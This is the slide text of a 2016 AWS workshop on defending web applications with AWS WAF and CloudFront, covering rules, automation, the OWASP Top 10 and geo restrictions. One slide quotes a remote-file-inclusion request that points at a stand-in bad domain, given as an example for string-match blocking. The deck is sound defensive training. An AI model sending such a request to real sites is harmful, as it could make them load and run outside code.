In this workshop, we help you understand how you can help protect your web applications from threats cost effectively by using AWS WAF and Amazon CloudFront. As attacks and attempts to exploit vulnerabilities in web applications become more sophisticated and automated, having an effective web request filtering solution becomes key to keeping your users' data safe. We will cover common attack vectors and what you can do to mitigate them. You will learn how to leverage AWS WAF in conjunction with Amazon CloudFront to detect unwanted traffic and block it using simple configurations and automations. Prerequisites: Participants should have an AWS account established and available for use during the workshop. Please bring your own laptop.

1. © 2016, Amazon Web Services, Inc. or its Affiliates. All rights reserved.
Vlad Vlasceanu, Heitor Vital, Chris Colthurst
November 29, 2016
Secure Your Web Application with
AWS WAF and Amazon CloudFront
SAC202 - Workshop

2. The workshop team is here to help!
Chris Colthurst Sean Greathouse Assaf Namer
Heitor Vital Vlad Vlasceanu Christian Williams

3. What to expect from the workshop
• Each table expected to work as a team – find your number table
• Content is broken up into 3 chapters:
• Introduction and baseline protection
• Security automation
• Advanced rules and additional security controls
• Team tasks:
• Start with a baseline sample website (provided)
• 3 tasks: implement the controls discussed in each chapter
• Handout:
• Contains additional guidance for each task
• Find and implement the optimal solution!

4. A story of courage, friendship
… and WAF

5. Prelude
Your friend Bob knows that you’re great with computers
and asks you to set up a website for him…

6. Setup workshop environment
Follow the steps in the Prelude section of your handout to launch the AWS
CloudFormation template:
Checkpoint: What is AWS CloudFormation?
Download the CloudFormation template from:
https://s3-us-west-2.amazonaws.com/sac202-waf/sac202-cloudformation.json
Launch a CloudFormation stack using the downloaded template
Detailed steps are available in your handout document
1
3
Open the AWS Management Console for your account and go to
CloudFormation
Select the Oregon, N. Virginia or Ireland AWS regions in the top right corner
2

7. Chapter 1: Baseline website
and web application protection

8. What is a web application firewall?
• Web application firewall (WAF) is an appliance,
server plugin, or filter that applies a set of rules
to HTTP traffic
• WAFs come in four flavors
• Pure play: Standalone appliance or software
• CDN: bundled with content delivery network
• Load balancer: bundled with a load balancer
• Universal threat manager (UTM): catch-all
for misc. security

9. Why use a WAF?
Application vulnerabilities:
Good users
Bad folks
Web server Database
Exploit
code
Your application

10. Why use a WAF?
Abuse detection and prevention:
Good users
Bad folks
Web server Database
Your applicationData
leaks

11. Why use a WAF?
Distributed denial of service (DDOS) attacks:
Good users
Bad folks
Web server Database
Your application

12. AWS
WAF
Why use a WAF?
AWS WAF  block the bad folks and allow the good users:
Good users
Bad folks
Web server Database
Your application

13. Why use a WAF?
• WAFs help protect websites and applications against
attacks that cause data breaches and downtime
• General WAF use cases
• Protect from SQL injection (SQLi) and cross-site scripting (XSS)
• Prevent website scraping, crawlers, and BOTs
• Mitigate DDOS (HTTP/HTTPS floods)
• Gartner reports that main driver of WAF purchases (25-
30%) is PCI compliance

14. What about DDOS?
DDOS
Targeted
attacks
WAF
Reflection and
amplification
Layer 4 and 7
floods
Slowloris
SSL abuse
HTTP floods
SQL injection
Bots and probes
Application
exploits
Social
engineering
Reverse
engineering

15. Attack vectors addressed by AWS WAF
• SQL injection: Attackers insert malicious SQL code into web requests in
an effort to extract data from your database
• Cross-site scripting (XSS): Malicious scripts are injected into otherwise
benign and trusted websites
• Scanners and probes: Malicious sources scan and probe Internet-facing
web applications for vulnerabilities
• Known attacker origins (IP reputation lists): A number of organizations
maintain reputation lists of IP addresses of known attackers
• Bots and scrapers: Some automated clients misrepresent themselves to
bypass restrictions
• Application-level exploits

16. Amazon CloudFront + AWS WAF
Amazon CloudFront
• 68 points of presence around the world
• Improves performance by caching static
content and optimizing connections for
dynamic content
• Disperses traffic across global edge locations
• DDOS attacks (such as HTTP floods) are
absorbed close to the source

17. Introducing the AWS WAF

18. Unique aspects of AWS WAF
• Customizable rules created by customers to
avoid false positives
• Full-feature API: This is a DevOps WAF that can
be deployed inline with new websites and
applications
• Integrated with AWS: CloudFront, CloudWatch
• Integrated with partners: Alert Logic, TrendMicro,
Imperva
• Pay as you go pricing

19. AWS WAF components
1. Conditions:
• IP match
• String match
• SQL injection match
• Cross-site scripting match
• Size constraints
2. Rules: Precedence / rule / action
3. Web access control lists (web ACL)
4. AWS resource: CloudFront distribution
5. Reporting: Real-time metrics, sampled web requests

20. • Conditions are lists of criteria that
identify components of web requests
• Conditions include matching on the following:
• IP address i.e., /8, /16, /24, /32
• Strings, i.e., URI, query string, header, etc.
• SQL injection, i.e., looks for valid SQL statements
• Conditions are logically disjoined
• Conditions are reusable elements
• Filter targets and transformations
• Positional constraints (contains, exact,…)
AWS WAF: Conditions

21. AWS WAF: Rules
• Rules are sets of conditions with a
predetermined action
• Available actions are:
• Block
• Allow
• Count
• Rules can logically join conditions
• Rules are reusable elements

22. AWS WAF: Web ACL
• Web ACLs contain a set of conditions, rules, and
actions
• Web ACLs are applied to one or many CloudFront
distributions
• Web ACLs show you real-time metrics and sampled
web requests for each rule
• Web ACLs evaluate rules in order
• Whitelisting or blacklisting behavior

23. AWS WAF: Resource
Web ACLs are applied to CloudFront distributions
• Rule reusability: use one web ACL for all
distributions
• Flexibility: use individual web ACL for each
distribution

24. AWS WAF: Reporting and logs
• Real-time metrics (CloudWatch):
• Blocked web requests
• Allowed web requests
• Counted web requests
• Adjustments to rules in response to
real-time metrics and sampled
requests
• Time period can be adjusted by
sliding graph endpoints or via filters.

25. AWS WAF request process

26. Example: Whitelisting good users
Verify that a valid referrer is present
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; …
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referrer: http://www.example.com/
Connection: keep-alive
AWS
WAF
RAW request headers
CloudFront
Check: Header “Referrer”
Match Type: Contains
Match: “example.com”
Action: ALLOW
Rule
String match condition
Good users

27. Example: Blacklisting bad bots
Block unwanted user agent headers and use transforms to stop evasion:
Host: www.example.com
User-Agent: bAdBoT
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referrer: http://www.InTeRnEtkItTiEs.com/
Connection: keep-alive
AWS
WAF
RAW request headers
CloudFront
Check: Header “User-Agent”
Transform: To lower
Match Type: Contains
Match: “badbot”
Action: BLOCK
Rule
String match condition
Scraper bot

28. Bob runs for city council
and is worried

29. Task 1: Protect Bob’s
campaign website from threats

31. Chapter 2: AWS WAF security
automation

32. The story so far
We have a website (or web application) operational✓
Able to monitor it and analyze logs✓
Able to filter basic common attack vectors✓

33. Bob won the election and is
busy improving the lives of his
constituency

34. The threat landscape is evolving
Dynamically reconfigure the WAF rules and conditions to
better adapt to changing threats
• React to changing sources of malicious traffic
• React to changing signatures of malicious requests
• Leverage reputation lists and keep them updated
• Predictive analysis

35. Integration with DevOps  Analyzer
AWS
WAF
Logs
Threat
analysis
Rule updater
Notification
Security
engineer
Web serverGood users
Bad folks

36. Integration with DevOps  Scheduled
Threat
database
Scheduler
AWS
WAF
Web serverGood users
Bad folks
Rule updater

37. Building blocks
Amazon
S3
AWS
Lambda
Amazon
CloudWatch
AWS
CloudFormation
Amazon
API Gateway
AWS WAF
Amazon
CloudFront
Amazon
Machine
Learning
Amazon
Kinesis
Amazon
SNS
Logs
1. Analyzer
2. Rule updater
Metrics
& Alarms Pack solution
HTTP/S
endpointRule engine
Entry point
Advanced
analysis
Log
streamingAlerts

38. Security automation examples
HTTP floods Scanners and
probes
IP reputation lists Bots and scrapers

39. Security automation examples
HTTP floods Scanners and
probes
IP reputation lists Bots and scrapers

40. Log parser
HTTP flood
Scanner & probe protection
new access log files
a
Amazon
CloudFront
Amazon S3
Bucket
AWS Lambda
Log Parser
AWS WAF
b
c

41. Security automation examples
HTTP floods Scanners and
probes
IP reputation lists Bots and scrapers

42. IP reputation lists
known-attacker
protection
hourly
a
Amazon
CloudFront
AWS Lambda
IP Lists Parser
AWS WAF
b
c
Amazon
CloudWatch
event
Third-party IP
reputation lists

43. Security automation examples
HTTP floods Scanners and
probes
IP reputation lists Bots and scrapers

44. Bots and scrapers
bad bot
scraper protection
Amazon
CloudFront
AWS Lambda
Access Handler
AWS WAF
b
c
d
web application
resources
<a href="/v1/name/" style="display: none"
aria-hidden="true">honeypot link</a>
a

45. Bob runs for state senate
and is very worried

46. Task 2: Protect Bob’s
campaign website from
changing threats

47. AWS
WAF
Good users
Hands-On: HTTP/S protection
Bad folks
Runs for state senate

49. Chapter 3: Additional security
controls

50. The story so far
We have a website (or web application) operational✓
Able to monitor it and analyze logs✓
Able to filter basic common attack vectors✓
Able to automate and react to dynamic security
conditions
✓

51. Bob won the election and is
busy improving the lives of his
constituency

52. Where do we go from here?
What can we do to further improve security?
Restrict content to the geography of our audience✓
Securing our specific application profile✓
Prevent CDN bypass✓
Comprehensive look at web app security – OWASP Top 10✓

53. OWASP top 10 (2013)
Represents a broad consensus about what the most critical web application
security flaws are
A1
Injection
A2
Broken auth. And
session mgmt.
A3
Cross-site scripting
(xss)
A4
Insecure direct
object references
A5
Security
misconfiguration
A6
Sensitive data
exposure
A7
Missing function
level access ctrl.
A8
Cross-site request
forgery (csrf)
A9
Using components
with known
vulnerabilities
A10
Unvalidated
redirects and
forwards

54. OWASP top 10 (2013)
Not all OWASP top 10 flaws can be addressed with a WAF
Security flaws that AWS WAF can help mitigate to varying degrees:
A1
Injection
(E.G. Sql injection)
A2
Broken auth. And
session mgmt.
A3
Cross-site scripting
(xss)
A4
Insecure direct
object references
A5
Security
misconfiguration
A6
Sensitive data
exposure
A7
Missing function
level access ctrl.
A8
Cross-site request
forgery (csrf)
A9
Using components
with known
vulnerabilities
A10
Unvalidated
redirects and
forwards
✓ ✓
✓
✓
✓

55. Securing our specific application profile
Know your application in-depth, even is it’s a open
source/commercial off-the-shelf product
What services/URL paths does it expose to the web?
Keep them all up-to-date, and install security patches
timely
Keep exposure footprint low
1
3
Know the packages, libraries, components your
application is leveraging
Additional features and services they exposed
2

56. Limit access to nonpublic features
Does your website/application have a control/admin interface?
• Whitelist access to only known IP sources
At risk for vulnerable platform runtime/middleware?
• Block suspect requests by string matching
Does your app or runtime server-side include web accessible
components?
• Block access to such component URLs via string matching
Wordpress Admin: http://<my_domain>/wp-admin/
http://<my_domain>/?_SERVER[DOCUMENT_ROOT]=http://<bad_domain>/bad.txt?
http://<your_joomla_cms>/components/com_mojo/wp-comments-post.php

57. Example: Using string match sets
{
"ByteMatchSet": {
"ByteMatchSetId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
"Name": "my-string-filters",
"ByteMatchTuples": [
{
"TargetString": "/wp-admin",
"PositionalConstraint": "STARTS_WITH",
"TextTransformation": ”URL_DECODE",
"FieldToMatch": { "Type": "URI" }
}
]
}
}

58. CloudFront geo restrictions
Geo restrictions or geoblocking: prevent users in specific
geographic locations from accessing content
• Amazon CloudFront supports geo restrictions at the country level
• Whitelisting or blacklisting approach
• Most commonly used to limit access to content to locations where a
distribution right exists
• Security perspective: limit exposure footprint and potentially
increase cost of launching attacks against your website

59. CloudFront geo restrictions in depth
• CloudFront distribution level restrictions
• CloudFront uses a third-party GeoIP database
• 99.8% accurate source IP geolocation
• Based on distribution restrictions, edge
location decides to allow or block
• Blocked requests return a 403 (Forbidden)
status code

60. Prevent CDN bypassing
Deploying a WAF filtering at the edge is effective
... as long as bad folks can’t bypass your CloudFront distribution
• Configure origins to only accept traffic from the CloudFront edge
locations
• Set up S3 origins to use an origin access identity (OAI) and
configure S3 bucket policies to accept GetObject API calls from the
OAI principal
• Configure firewall rules on custom origins to accept traffic only from
CloudFront IP ranges

61. Getting the AWS IP ranges
AWS publishes its current IP address ranges in JSON format:
• Both IPV4 and IPV6 ranges are published
• Filter the service attribute by the CLOUDFRONT value
• Track changes in list via the createDate attribute
• Subscribe to the following Amazon SNS topic to receive notifications
when AWS IP address ranges change:
https://ip-ranges.amazonaws.com/ip-ranges.json
Topic ARN: arn:aws:sns:us-east-1:806199016981:AmazonIpSpaceChanged

62. Automatic VPC security group updates
Blog post: How to Automatically Update Your Security Groups for
Amazon CloudFront and AWS WAF by Using AWS Lambda
http://amzn.to/2fj4Q8e
Create a VPC security group
Use tagging to designate they can be autoupdated
Create the AWS Lambda function
Using the provided code and execution role
1
3
Create an IAM policy and AWS Lambda execution role
Grant the function permission to change the security group
2
Create the function trigger
Using the Amazon SNS AmazonIpSpaceChanges topic
4

63. Bob runs for congress
and is extremely worried

64. Task 3: Add additional security
controls to bob’s campaign
website

66. Thank you!

67. Useful resources
AWS WAF Security Automations
https://aws.amazon.com/answers/security/aws-waf-security-automations/
AWS Best Practices for DDOS Resiliency
https://d0.awsstatic.com/whitepapers/Security/DDoS_White_Paper.pdf

68. Remember to complete
your evaluations!

69. Related sessions
CTD204 – Offload Security Heavy-lifting to the AWS Edge
- Nihar Bihani, Sr. Manager, AWS Product Management
SAC304 - Predictive Security: Using Big Data to Fortify Your Defenses
- Michael Capicotto and Matt Nowina, AWS Solutions Architects
SAC316 - Security Automation: Spend Less Time Securing Your
Applications
- Venkat Vijayaraghavan, AWS Sr. Product Manager; Nathan Dye, AWS Software
Development Manager